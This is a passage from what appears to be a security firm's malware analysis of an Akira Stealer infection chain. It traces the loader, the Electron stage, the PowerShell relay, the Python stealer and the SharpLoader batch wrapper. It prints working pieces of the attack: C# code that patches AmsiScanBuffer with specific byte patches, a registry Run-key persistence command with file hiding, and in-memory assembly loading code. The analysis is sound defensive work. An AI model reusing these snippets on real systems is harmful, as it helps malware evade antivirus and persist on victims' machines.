for flexible deployment and easier integration of dynamic control logic.",[12,5147,5148,5149,5151],{},"What made ",[63,5150,4618],{}," particularly dangerous was its ability to operate without dropping any additional files beyond what had already been staged. The stealer script was invoked directly from disk, but all staging and execution logic remained embedded within the Electron bundle.",[12,5153,5154,5155,5157,5158,1014],{},"In summary, ",[63,5156,4618],{}," served as the obfuscated, multi-layered execution core — acting as the gatekeeper between initial persistence and the full activation of the Akira Stealer payload in ",[63,5159,4622],{},[186,5161,5163,5164,5166],{"id":5162},"_214-cmdexe-powershell-relay","2.1.4 ",[63,5165,5123],{}," & PowerShell Relay",[12,5168,192],{},[12,5170,5171],{},"This stage of the execution chain functioned as a relay — not for payload logic, but for obfuscation and indirection.",[12,5173,5174,5175,5177,5178,5180,5181,1014],{},"After ",[63,5176,4618],{}," completed its role of unpacking and decoding the payload, it spawned a ",[63,5179,5123],{}," process. This process did not contain any malicious logic itself, nor did it write or modify files. Its sole purpose was to serve as a wrapper for launching a PowerShell session with an ",[251,5182,5183],{},"encoded command",[12,5185,5186],{},"This method is a well-known tactic used to reduce visibility and avoid detection:",[1255,5188,5189,5200],{},[1258,5190,5191,1551,5194],{},[251,5192,5193],{},"Execution Chain",[56,5195,5198],{"className":5196,"code":5197,"language":61},[59],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[63,5199,5197],{"__ignoreMap":65},[1258,5201,5202,1551,5205],{},[251,5203,5204],{},"Purpose",[1255,5206,5207,5210,5213],{},[1258,5208,5209],{},"Encapsulates PowerShell execution within an additional shell",[1258,5211,5212],{},"Hides the actual PowerShell code from direct visibility in logs",[1258,5214,5215,5216,5219],{},"Evades EDRs that trigger on direct ",[63,5217,5218],{},"powershell.exe"," usage with suspicious parameters",[12,5221,5222,5223,5225],{},"By embedding the PowerShell script as a Base64-encoded string and invoking it through ",[63,5224,5123],{},", the attacker avoided multiple forms of detection:",[1255,5227,5228,5233,5238],{},[1258,5229,5230],{},[251,5231,5232],{},"Command-line heuristic filters",[1258,5234,5235],{},[251,5236,5237],{},"Standard logging (e.g., Event ID 4104, 4688)",[1258,5239,5240],{},[251,5241,5242,5243,5245,5246,805,5249,5252],{},"Rule-based detections for ",[63,5244,5218],{}," arguments like ",[63,5247,5248],{},"-NoProfile",[63,5250,5251],{},"-ExecutionPolicy Bypass",", or inline scripts",[12,5254,5255,5256,5258,5259,5261],{},"Notably, the PowerShell command was kept minimal and solely focused on launching ",[63,5257,4593],{}," with a path to the embedded stealer script — ",[63,5260,4622],{},". No additional modules were loaded, and no obvious signatures were present in memory.",[12,5263,5264],{},"This relay technique is often used in red teaming and by sophisticated infostealers alike — serving as a lightweight evasion layer that’s easy to implement but hard to catch without telemetry correlation.",[12,5266,5030,5267,5269],{},[63,5268,5123],{}," served exactly that purpose: a simple, silent bridge between JavaScript logic and Python execution — one that almost slipped through unnoticed.",[186,5271,5273,5274,5276,5277],{"id":5272},"_215-pythonexe-with-astorpy","2.1.5 ",[63,5275,4593],{}," with ",[63,5278,4622],{},[12,5280,192],{},[12,5282,5283,5284,5286,5287,5289],{},"The final and most impactful stage of the execution chain was reached when ",[63,5285,4593],{}," invoked ",[63,5288,4622],{}," — a Python-based, modular infostealer operating entirely in memory. This script represented the operational core of the entire attack chain.",[12,5291,5292,5293,5295],{},"Unlike many commodity stealers, ",[63,5294,4622],{}," was not deployed in plaintext. It was protected by a multi-layered decryption mechanism:",[1255,5297,5298,5307],{},[1258,5299,5300,5303,5304,1014],{},[251,5301,5302],{},"Decryption Stack",": The file was first GZIP-compressed and then encrypted using ",[251,5305,5306],{},"AES-256-CBC",[1258,5308,5309,5312],{},[251,5310,5311],{},"Key Derivation",": A PBKDF2-based key derivation process was used (SHA-512, 1,000,000 iterations), making static analysis and brute-forcing highly impractical.",[12,5314,5315],{},"Once decrypted at runtime, the script executed several specialized modules, all targeting sensitive data sources:",[12,5317,5318],{},[251,5319,5320],{},"Core Capabilities",[1255,5322,5323,5329,5339,5349],{},[1258,5324,5325,5328],{},[251,5326,5327],{},"Browser Data Extraction",": Retrieved login credentials, cookies, and autofill data from Chromium-based browsers (Chrome, Edge, Brave, Opera)",[1258,5330,5331,5334,5335,5338],{},[251,5332,5333],{},"Token Harvesting",": Collected session tokens, particularly from ",[251,5336,5337],{},"Discord",", and scanned for cryptocurrency wallet extensions",[1258,5340,5341,5344,5345,5348],{},[251,5342,5343],{},"Data Packaging",": Aggregated all harvested data into a structured ",[251,5346,5347],{},"ZIP archive",", preserving directory and file context for attacker-side parsing",[1258,5350,5351,5354],{},[251,5352,5353],{},"Exfiltration",": Uploaded the resulting archive to public APIs and infrastructure.",[12,5356,5357],{},[251,5358,4988],{},[12,5360,5361],{},"The entire stealer logic executed from memory, with no persistent files written to disk. It left minimal telemetry traces beyond in-process memory artifacts and standard subprocess invocation. No attempt was made to establish persistence at this stage — the goal was quick, efficient, and silent data theft.",[12,5363,5364],{},"The use of legitimate APIs for exfiltration also made detection and prevention significantly harder, as outbound traffic blended in with routine internet activity.",[12,5366,5367,5368,5370],{},"This stage ultimately confirmed the malware’s identity: a variant of ",[251,5369,4683],{},", known for its:",[1255,5372,5373,5376,5379,5382],{},[1258,5374,5375],{},"High modularity",[1258,5377,5378],{},"Runtime obfuscation",[1258,5380,5381],{},"Commercial distribution via Telegram",[1258,5383,5384],{},"Strong focus on credential harvesting and token-based session hijacking",[12,5386,5387,5388,5390],{},"Together with the earlier stages, ",[63,5389,4622],{}," formed the critical endpoint of a stealthy and well-engineered infostealer chain. In the following sections, we dissect this component further and explain how we reversed its logic, mapped its infrastructure, and recovered every indicator of compromise used during its operation.",[25,5392,5394,5395],{"id":5393},"_3-deep-dive-updaterexe","3. Deep Dive: ",[63,5396,4614],{},[12,5398,31],{},[12,5400,5401,5403],{},[63,5402,4614],{}," was the initial binary observed during post-compromise analysis. Despite its neutral appearance and negligible detection footprint, it played a critical role in maintaining the malware's operational persistence and delivering the next-stage payload.",[41,5405,5407],{"id":5406},"_31-properties","3.1 Properties",[12,5409,47],{},[417,5411,5412,5422],{},[422,5413,5414],{},[426,5415,5416,5419],{},[430,5417,5418],{},"Property",[430,5420,5421],{},"Value",[438,5423,5424,5434,5444,5454,5464,5474],{},[426,5425,5426,5431],{},[443,5427,5428],{},[251,5429,5430],{},"Format:",[443,5432,5433],{},"Windows Portable Executable (PE32)",[426,5435,5436,5441],{},[443,5437,5438],{},[251,5439,5440],{},"Architecture:",[443,5442,5443],{},"x86-64",[426,5445,5446,5451],{},[443,5447,5448],{},[251,5449,5450],{},"Size:",[443,5452,5453],{},"~154 KB",[426,5455,5456,5461],{},[443,5457,5458],{},[251,5459,5460],{},"Entropy:",[443,5462,5463],{},"Normal (non-packed)",[426,5465,5466,5471],{},[443,5467,5468],{},[251,5469,5470],{},"Signatures:",[443,5472,5473],{},"None",[426,5475,5476,5481],{},[443,5477,5478],{},[251,5479,5480],{},"VirusTotal Detection:",[443,5482,5483],{},"1/69 at time of analysis",[12,5485,5486],{},"The file exhibited a clean import table and no embedded string indicators. No known packers, crypters, or runtime obfuscation mechanisms were detected. The structure was consistent with custom-compiled binaries.",[41,5488,5490],{"id":5489},"_32-behavioral-analysis","3.2 Behavioral Analysis",[12,5492,47],{},[12,5494,5495],{},[251,5496,5497],{},"No User Interaction Required",[12,5499,5500,5501,5503],{},"The malware chain executed without any required user interaction. Based on Defender’s process telemetry, the initial binary (",[63,5502,4614],{},") was launched automatically — most likely via a persistence mechanism such as a registry autorun key. However, due to the age of the compromise and the absence of historical event logs, the exact method of persistence could not be recovered.",[12,5505,5506],{},[251,5507,5508],{},"Silent Execution and Staging",[12,5510,5511,5512,5514,5515,5517],{},"Upon execution, ",[63,5513,4614],{}," immediately launched ",[63,5516,4618],{}," with no visual window and no user prompts. The staging occurred silently in the background. There was no evidence of user consent dialogs, UAC prompts, or GUI components.",[12,5519,5520],{},[251,5521,5522],{},"Payload Deployment Behavior",[12,5524,5525,5527],{},[63,5526,4618],{}," was found to be part of an Electron application structure, but the exact origin of its deployment remains unclear. One of the following is assumed:",[1255,5529,5530,5536],{},[1258,5531,5532,5533,5535],{},"The payload may have been bundled internally within ",[63,5534,4614],{}," (e.g., embedded resource), or",[1258,5537,5538],{},"It may have been retrieved from a remote source",[12,5540,5541],{},"Due to a lack of network telemetry and no recovered hardcoded URL, the delivery vector for the Electron app remains inconclusive.",[12,5543,5544],{},[251,5545,5546],{},"Process Chain Behavior",[12,5548,5549,5550,5552,5553,5555],{},"Once executed, ",[63,5551,4614],{}," spawned ",[63,5554,4618],{}," as a child process. The invocation was non-interactive, and no process spawned from the chain exhibited UI activity. The process chain continued as expected:",[56,5557,5560],{"className":5558,"code":5559,"language":61},[59],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[63,5561,5559],{"__ignoreMap":65},[12,5563,5564],{},"All execution stages operated without requiring user input, relying solely on pre-configured launch logic and silent execution paths. This minimized exposure and helped the malware remain undetected over an extended period.",[41,5566,5568],{"id":5567},"_33-role-in-the-infection-chain","3.3 Role in the Infection Chain",[12,5570,47],{},[12,5572,5573,5575,5576,5579,5580,1014],{},[63,5574,4614],{}," played a ",[251,5577,5578],{},"single but essential role"," within the broader infection chain: it was responsible for the persistence and redeployment of the stage-2 component — ",[63,5581,4618],{},[12,5583,5584],{},[251,5585,5586],{},"Confirmed Characteristics",[1255,5588,5589,5596,5601],{},[1258,5590,5591,5592,5595],{},"It ",[251,5593,5594],{},"did not"," contain or execute malicious logic directly",[1258,5597,5591,5598,5600],{},[251,5599,5594],{}," perform any data exfiltration",[1258,5602,5591,5603,5605],{},[251,5604,5594],{}," interact with browser credential stores or sensitive user data",[12,5607,5608,5609,5611],{},"Its sole purpose was to silently launch ",[63,5610,4618],{}," during user login, using a registry autorun entry as the most likely method of persistence (though not directly recovered due to telemetry limitations).",[12,5613,5614,5615,5617,5618,5620],{},"By acting as an isolated first-stage loader, ",[63,5616,4614],{}," ensured that the actual stealer payload (",[63,5619,4622],{},") remained concealed in deeper layers of execution. This separation of duties allowed the attackers to:",[1255,5622,5623,5626,5629],{},[1258,5624,5625],{},"Avoid correlation by static AV or sandbox systems",[1258,5627,5628],{},"Swap or update payloads without modifying the loader",[1258,5630,5631],{},"Reduce behavioral signals at the entry point",[12,5633,5634,5635,5638],{},"This pattern is typical in ",[251,5636,5637],{},"malware-as-a-service (MaaS)"," operations, where delivery mechanisms are generic and payloads are modular or client-specific.",[12,5640,5030,5641,5643],{},[63,5642,4614],{}," provided just enough logic to serve as a reliable and stealthy entry point — nothing more, but also nothing less.",[41,5645,5647],{"id":5646},"_34-persistence-via-registry-confirmed-in-astorpy","3.4 Persistence via Registry (Confirmed in astor.py)",[12,5649,47],{},[12,5651,5652,5653,5655],{},"Static analysis of the Python payload revealed that ",[63,5654,4614],{}," is explicitly persisted using a registry autorun entry:",[1255,5657,5658,5666,5674],{},[1258,5659,5660,1062,5663],{},[251,5661,5662],{},"Registry Path",[63,5664,5665],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[1258,5667,5668,1062,5671],{},[251,5669,5670],{},"Value Name",[63,5672,5673],{},"Realtek Audio",[1258,5675,5676,1062,5679],{},[251,5677,5678],{},"Payload Path",[63,5680,5681],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[12,5683,5684],{},"The corresponding registry command is executed via PowerShell:",[56,5686,5690],{"className":5687,"code":5688,"language":5689,"meta":65,"style":65},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[63,5691,5692],{"__ignoreMap":65},[102,5693,5694],{"class":104,"line":105},[102,5695,5688],{},[12,5697,5698],{},"This ensures the malware is launched at every user login. The file is also marked with hidden and system attributes to further evade detection:",[56,5700,5702],{"className":5687,"code":5701,"language":5689,"meta":65,"style":65},"attrib +h +s \"Updater.exe\"\n",[63,5703,5704],{"__ignoreMap":65},[102,5705,5706],{"class":104,"line":105},[102,5707,5701],{},[12,5709,5710],{},"This persistence mechanism was embedded directly into the astor.py code, confirming that the final-stage stealer actively maintains loader presence on disk and in the startup registry.",[41,5712,5714],{"id":5713},"_35-summary","3.5 Summary",[12,5716,47],{},[2109,5718,5719],{},[12,5720,5721,5722,5724],{},"While ",[63,5723,4614],{}," was not inherently malicious in structure or content, its contextual behavior within the execution chain confirmed its role as a malware loader.",[52,5726],{"className":5727},[4854],[12,5729,5730],{},"This binary served as a clean, minimalistic first-stage launcher — avoiding detection by static analysis, AV engines, and behavioral rules. Its design focused purely on stealth and operational support, not on executing malicious logic itself.",[12,5732,5733,5734,5736,5737,5739,5740,5743],{},"However, its role extended beyond initial deployment. During reverse engineering of the ",[63,5735,4622],{}," payload, we identified logic that actively checked for the presence of ",[63,5738,4614],{},". This check was part of a broader ",[251,5741,5742],{},"health and self-healing cycle"," implemented within the stealer code — a mechanism designed to verify the integrity of the infection chain and restore missing components if needed.",[12,5745,5746,5747,5749,5750,5753],{},"This means that ",[63,5748,4614],{}," was not only responsible for initiating the malware, but also formed part of its ",[251,5751,5752],{},"ongoing runtime validation",". Without this stub, the malware could lose its ability to reinitialize in future sessions.",[12,5755,5756],{},[251,5757,5758,5759,1551],{},"Key Functions of ",[63,5760,4614],{},[1255,5762,5763,5768,5773,5776],{},[1258,5764,5765,5766],{},"Seamless deployment of ",[63,5767,4618],{},[1258,5769,5770,5771],{},"Indirect execution of ",[63,5772,4622],{},[1258,5774,5775],{},"Decoupling of loader and payload logic",[1258,5777,5778,5781],{},[251,5779,5780],{},"Referenced by the payload itself"," as part of operational health monitoring",[12,5783,5784],{},"In Section 5, we will detail the internal health-check routines of the stealer, including its self-healing behavior and integrity validation mechanisms.",[12,5786,5787,5788,5790],{},"For now, it is clear that ",[63,5789,4614],{}," served as both ignition and anchor point in this layered infostealer architecture.",[41,5792,5794],{"id":5793},"_36-extraction-trick-outsmarting-the-loader","3.6 Extraction Trick: Outsmarting the Loader",[12,5796,47],{},[12,5798,5799],{},"Sometimes, the best reverse engineering results don’t come from deep binary disassembly — but from a bit of trickery and patience.",[12,5801,5802,5803,5805,5806,5808],{},"While analyzing the infection in a controlled lab environment, we noticed something odd: ",[63,5804,4614],{}," was present and executing, but ",[63,5807,4618],{}," had vanished from the file system. That’s when we had an idea — what happens if we let the malware repair itself?",[12,5810,5811,5812,5817,5818,5820],{},"We deliberately ",[251,5813,5814,5815],{},"deleted ",[63,5816,4618],{}," from the infected environment while leaving ",[63,5819,4614],{}," untouched. And sure enough, after the next user session login, the loader sprang into action — not with a tantrum, but with a quiet attempt to rebuild its second stage.",[12,5822,5823,5824,805,5826,5828,5829,5832,5833,5836,5837,805,5839,5842,5843,5845],{},"Here’s where it got interesting: Instead of directly recreating ",[63,5825,4618],{},[63,5827,4614],{}," first dropped a file named ",[63,5830,5831],{},"app-64.7z"," — a standard ",[251,5834,5835],{},"7-Zip archive",". This archive contained the full Electron application structure, including ",[63,5838,4618],{},[63,5840,5841],{},"resources",", and the ",[63,5844,5068],{}," payload with all embedded logic.",[12,5847,5848,5849,1014],{},"We had effectively ",[251,5850,5851],{},"forced the malware to hand us the source package",[12,5853,5854],{},[2772,5855],{"alt":5856,"src":5857},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[12,5859,5860],{},"With this 7z archive in hand, we were able to extract, decompress, and fully reverse the JavaScript-based orchestration logic without even touching the original loader again. The archive structure matched the expected Electron app layout perfectly.",[12,5862,5863,5864,5867],{},"This behavior strongly suggests that the attackers deliberately chose a ",[251,5865,5866],{},"modular and maintainable architecture",", using archives as flexible payload containers. It also allowed them to swap or update payload components without recompiling the loader binary.",[12,5869,5870],{},"And in our case? It allowed us to outsmart their chain, intercept the drop, and walk away with the full package — like stealing the blueprints off the workbench while the builder wasn’t looking.",[12,5872,5873,5874],{},"Let’s just say: ",[251,5875,5876,5877,805,5880,5883],{},"sometimes the best forensic tools are ",[63,5878,5879],{},"del",[63,5881,5882],{},"wait",", and a little curiosity.",[25,5885,5887,5888],{"id":5886},"_4-deep-dive-powbat","4. Deep Dive: ",[63,5889,5890],{},"pow.bat",[12,5892,31],{},[12,5894,5895,5896,5899],{},"In the analyzed malware campaign, the component ",[63,5897,5898],{},"Invoke-SharpLoader"," acts as a custom, memory-resident .NET loader that exhibits a highly modular and evasive execution flow. This section dissects its internal architecture, its anti-analysis strategy via AMSI patching, and its role in facilitating the second stage payload.",[41,5901,5903],{"id":5902},"_41-binary-properties-sharploader-batch-wrapper","4.1 Binary Properties – SharpLoader Batch Wrapper",[12,5905,47],{},[12,5907,5908,5909,5911],{},"Before being executed to load the .NET payload in memory, the outer wrapper ",[63,5910,5890],{}," shows the following characteristics based on static analysis:",[417,5913,5914,5922],{},[422,5915,5916],{},[426,5917,5918,5920],{},[430,5919,5418],{},[430,5921,5421],{},[438,5923,5924,5933,5942,5952,5961,5971,5981,5990],{},[426,5925,5926,5930],{},[443,5927,5928],{},[251,5929,5430],{},[443,5931,5932],{},"DOS Batch File",[426,5934,5935,5939],{},[443,5936,5937],{},[251,5938,5440],{},[443,5940,5941],{},"Script-based (not compiled binary)",[426,5943,5944,5949],{},[443,5945,5946],{},[251,5947,5948],{},"File Size:",[443,5950,5951],{},"27.79 KB (28454 bytes)",[426,5953,5954,5958],{},[443,5955,5956],{},[251,5957,5460],{},[443,5959,5960],{},"Normal (plain ASCII text)",[426,5962,5963,5968],{},[443,5964,5965],{},[251,5966,5967],{},"Magic:",[443,5969,5970],{},"DOS batch file, ASCII text",[426,5972,5973,5978],{},[443,5974,5975],{},[251,5976,5977],{},"Digital Signature:",[443,5979,5980],{},"None detected",[426,5982,5983,5987],{},[443,5984,5985],{},[251,5986,5480],{},[443,5988,5989],{},"26 / 61 (at time of analysis)",[426,5991,5992,5997],{},[443,5993,5994],{},[251,5995,5996],{},"Threat Labels:",[443,5998,5999,805,6002,805,6005,805,6007],{},[63,6000,6001],{},"trojan",[63,6003,6004],{},"downloader",[63,6006,5689],{},[63,6008,6009],{},"agentb",[12,6011,6012,6013,6016],{},"Despite being a simple ",[63,6014,6015],{},".bat"," file, the script evades many static detections and relies heavily on living-off-the-land techniques such as PowerShell to download and execute obfuscated and encrypted payloads.",[41,6018,6020,6021,1289],{"id":6019},"_42-amsi-bypass-technique-class-gofor4msi","4.2 AMSI Bypass Technique (Class: ",[63,6022,6023],{},"gofor4msi",[12,6025,47],{},[12,6027,6028],{},"One of the first defensive mechanisms bypassed by SharpLoader is AMSI — the Anti-Malware Scan Interface — a Microsoft feature integrated into scripting engines like PowerShell and Windows Script Host to provide real-time content scanning for suspicious behavior. Malware authors often attempt to bypass AMSI to avoid detection by endpoint protection systems.",[12,6030,6031,6032,6035,6036,6039,6040,6043,6044,6047,6048,6051],{},"In SharpLoader, the AMSI bypass is implemented through ",[251,6033,6034],{},"direct in-memory patching"," of the ",[63,6037,6038],{},"AmsiScanBuffer"," function within the ",[63,6041,6042],{},"amsi.dll",". This function is normally responsible for analyzing script content and returning a result code indicating whether the content is suspicious (",[63,6045,6046],{},"AMSI_RESULT_DETECTED",") or safe (",[63,6049,6050],{},"AMSI_RESULT_CLEAN",").",[12,6053,6054],{},"The relevant in-memory patching code is:",[56,6056,6060],{"className":6057,"code":6058,"language":6059,"meta":65,"style":65},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[63,6061,6062,6067,6072,6077],{"__ignoreMap":65},[102,6063,6064],{"class":104,"line":105},[102,6065,6066],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[102,6068,6069],{"class":104,"line":111},[102,6070,6071],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[102,6073,6074],{"class":104,"line":329},[102,6075,6076],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[102,6078,6079],{"class":104,"line":346},[102,6080,6081],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[12,6083,6084],{},"This sequence performs the following steps:",[6086,6087,6088,6097,6108,6118],"ol",{},[1258,6089,6090,6093,6094,1014],{},[251,6091,6092],{},"Load the AMSI DLL"," into the process using ",[63,6095,6096],{},"LoadLibrary(\"amsi.dll\")",[1258,6098,6099,6102,6103,4623,6105,1014],{},[251,6100,6101],{},"Resolve the memory address"," of the function ",[63,6104,6038],{},[63,6106,6107],{},"GetProcAddress()",[1258,6109,6110,6113,6114,6117],{},[251,6111,6112],{},"Change the memory protection"," of the address using ",[63,6115,6116],{},"VirtualProtect()"," to make it writable.",[1258,6119,6120,6123,6124,6127],{},[251,6121,6122],{},"Overwrite the beginning of the function"," using ",[63,6125,6126],{},"Marshal.Copy()"," with a small shellcode patch.",[12,6129,6130],{},"The patch applied for 64-bit systems is:",[56,6132,6134],{"className":6057,"code":6133,"language":6059,"meta":65,"style":65},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[63,6135,6136],{"__ignoreMap":65},[102,6137,6138],{"class":104,"line":105},[102,6139,6133],{},[12,6141,6142],{},"This corresponds to the following instructions:",[1255,6144,6145,6154],{},[1258,6146,6147,6150,6151],{},[63,6148,6149],{},"mov eax, 0x80070057"," → sets the return code to the Windows error code ",[63,6152,6153],{},"E_INVALIDARG",[1258,6155,6156,6159],{},[63,6157,6158],{},"ret"," → immediately returns from the function",[12,6161,6162,6163,6165],{},"This effectively causes ",[63,6164,6038],{}," to fail silently and return a non-detection result, neutralizing AMSI checks. The malware can now execute scripts or .NET code that would otherwise trigger antivirus alerts.",[12,6167,6168],{},"If executed on a 32-bit system, a different patch is applied:",[56,6170,6172],{"className":6057,"code":6171,"language":6059,"meta":65,"style":65},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[63,6173,6174],{"__ignoreMap":65},[102,6175,6176],{"class":104,"line":105},[102,6177,6171],{},[12,6179,6180],{},"This reflects the same goal — forcing a \"clean\" result — but adapted to the x86 calling convention.",[12,6182,6183,6184,805,6187,6190,6191,6194],{},"Using raw P/Invoke calls like ",[63,6185,6186],{},"LoadLibrary",[63,6188,6189],{},"GetProcAddress",", and ",[63,6192,6193],{},"VirtualProtect"," allows this patching to be done dynamically and without invoking any high-level APIs that might be monitored by EDR tools. This method is compact, effective, and leaves minimal forensic artifacts.",[12,6196,6197,6198,6201],{},"In summary, this AMSI bypass technique is a ",[251,6199,6200],{},"low-level, direct memory attack on the antivirus interface",", carried out in milliseconds during runtime. It's a powerful example of why behavioral monitoring and memory inspection are essential in modern endpoint defense systems.",[41,6203,6205],{"id":6204},"_43-stage-2-payload-handling","4.3 Stage 2 Payload Handling",[12,6207,47],{},[12,6209,6210,6211,6214],{},"After the AMSI bypass is complete, the loader proceeds to retrieve and prepare the second-stage payload. This payload is not embedded in the loader itself but is fetched either from a remote server or read from disk — depending on how the loader is invoked via the ",[63,6212,6213],{},"$location"," parameter.",[12,6216,6217,6218,6221,6222,6225,6226,6229,6230,6233,6234,6237],{},"If the location begins with ",[63,6219,6220],{},"http",", it is interpreted as a URL and the loader uses ",[63,6223,6224],{},"Get_Stage2()"," to download the payload via ",[63,6227,6228],{},"HttpWebRequest",". If it is a local path, ",[63,6231,6232],{},"Get_Stage2disk()"," reads the contents directly from the file system. In both cases, the expected file content is a ",[251,6235,6236],{},"Base64-encoded, GZip-compressed, and AES-encrypted"," blob.",[12,6239,6240,6241,6244],{},"The loader then performs a ",[251,6242,6243],{},"four-stage decoding and decryption pipeline"," entirely in memory:",[6086,6246,6247,6253,6263,6273],{},[1258,6248,6249,6252],{},[251,6250,6251],{},"Base64 Decoding",": Converts the encoded string into raw bytes. This step is designed to obscure the actual binary content from static inspection tools and prevents straightforward pattern matching.",[1258,6254,6255,6258,6259,6262],{},[251,6256,6257],{},"GZip Decompression",": The decoded bytes are passed to a ",[63,6260,6261],{},"GZipStream",", which decompresses the payload. Compression reduces file size and adds another layer of obfuscation.",[1258,6264,6265,6268,6269,6272],{},[251,6266,6267],{},"AES Decryption",": The compressed bytes are decrypted using AES (Rijndael) in CBC mode. The key is derived at runtime from the user-provided password using SHA-256 hashing combined with PBKDF2 (",[63,6270,6271],{},"Rfc2898DeriveBytes",") and a static salt.",[1258,6274,6275,6278],{},[251,6276,6277],{},"Salt Removal",": The decrypted result still contains a fixed-length salt prefix (4 bytes). These bytes are removed manually to obtain the clean binary blob that represents a valid .NET assembly.",[12,6280,6281],{},"The decryption pipeline is executed like so:",[56,6283,6285],{"className":6057,"code":6284,"language":6059,"meta":65,"style":65},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[63,6286,6287,6292],{"__ignoreMap":65},[102,6288,6289],{"class":104,"line":105},[102,6290,6291],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[102,6293,6294],{"class":104,"line":111},[102,6295,6296],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[12,6298,6299,6300,6303],{},"Here, ",[63,6301,6302],{},"AES_Decrypt()"," is a custom function that wraps the Rijndael algorithm, configured with a 256-bit key and a 128-bit IV (initialization vector), both derived from the password.",[12,6305,6306],{},[251,6307,6308],{},"Key Design Observations:",[1255,6310,6311,6314,6317],{},[1258,6312,6313],{},"The use of AES-CBC with PBKDF2 makes brute-forcing the password non-trivial.",[1258,6315,6316],{},"Since decryption happens in memory, no intermediate results are ever written to disk — reducing forensic artifacts.",[1258,6318,6319],{},"If the wrong password is supplied, decryption silently fails or produces invalid data, which may lead to failed execution or hard-to-trace exceptions.",[12,6321,6322],{},"In summary, this multi-stage payload handling approach significantly raises the bar for both signature- and heuristic-based static detection. Without either live execution or deep inspection of the loader behavior, defenders are unlikely to uncover the embedded payload without also knowing the password and exact decoding logic.",[41,6324,6326],{"id":6325},"_44-dynamic-assembly-loading","4.4 Dynamic Assembly Loading",[12,6328,47],{},[12,6330,6331],{},"Once the second-stage payload has been successfully decrypted, the resulting byte array represents a valid .NET assembly. Instead of writing this assembly to disk — a common indicator for antivirus or EDR systems — SharpLoader executes it directly in memory using reflection:",[56,6333,6335],{"className":6057,"code":6334,"language":6059,"meta":65,"style":65},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[63,6336,6337,6342],{"__ignoreMap":65},[102,6338,6339],{"class":104,"line":105},[102,6340,6341],{},"Assembly a = Assembly.Load(bin);\n",[102,6343,6344],{"class":104,"line":111},[102,6345,6346],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[12,6348,6349,6350,6353],{},"This technique is referred to as ",[251,6351,6352],{},"fileless execution",". It is highly evasive because it:",[1255,6355,6356,6359,6362],{},[1258,6357,6358],{},"Avoids touching the disk, leaving no file-based IOCs (indicators of compromise)",[1258,6360,6361],{},"Makes traditional forensic acquisition harder, as no binary is saved on disk",[1258,6363,6364],{},"Evades static signature-based detection, since AV engines often rely on scanning files",[12,6366,6367,6368,6371,6372,6375],{},"If the ",[63,6369,6370],{},"EntryPoint"," is not ",[63,6373,6374],{},"static",", the loader includes a fallback logic:",[56,6377,6379],{"className":6057,"code":6378,"language":6059,"meta":65,"style":65},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n object o = a.CreateInstance(method.Name);\n method.Invoke(o, null);\n}\n",[63,6380,6381,6386,6391,6396,6401,6406],{"__ignoreMap":65},[102,6382,6383],{"class":104,"line":105},[102,6384,6385],{},"MethodInfo method = a.EntryPoint;\n",[102,6387,6388],{"class":104,"line":111},[102,6389,6390],{},"if (method != null)\n",[102,6392,6393],{"class":104,"line":329},[102,6394,6395],{},"{\n",[102,6397,6398],{"class":104,"line":346},[102,6399,6400],{}," object o = a.CreateInstance(method.Name);\n",[102,6402,6403],{"class":104,"line":650},[102,6404,6405],{}," method.Invoke(o, null);\n",[102,6407,6408],{"class":104,"line":656},[102,6409,6410],{},"}\n",[12,6412,6413,6414,6417],{},"This ensures compatibility with assemblies that require an instantiated object for execution (e.g., ",[63,6415,6416],{},"public int Main()"," inside a class instance). The code dynamically creates an instance of the class and then calls the entry point method.",[12,6419,6420],{},"Combined with the AMSI bypass and in-memory decryption, this mechanism delivers the final payload to execution in a stealthy, fully fileless manner — a hallmark of modern, evasive malware.",[41,6422,6424],{"id":6423},"_45-command-line-parameters-and-flexibility","4.5 Command Line Parameters and Flexibility",[12,6426,47],{},[12,6428,6429,6430,6432],{},"The PowerShell function ",[63,6431,5898],{}," is designed to act as a flexible wrapper for arbitrary .NET payloads. It supports dynamic input of both the payload location and arguments, allowing a single loader instance to be reused across multiple operations or campaigns.",[12,6434,6435],{},[251,6436,6437],{},"Supported Parameters:",[1255,6439,6440,6446,6452,6472],{},[1258,6441,6442,6445],{},[63,6443,6444],{},"-location"," (mandatory): Specifies either a URL or a local file path to the stage two encrypted payload.",[1258,6447,6448,6451],{},[63,6449,6450],{},"-password"," (mandatory): Used to derive the AES decryption key.",[1258,6453,6454,805,6457,805,6460,6463,6464,6467,6468,6471],{},[63,6455,6456],{},"-argument",[63,6458,6459],{},"-argument2",[63,6461,6462],{},"-argument3"," (optional): These are forwarded directly to the 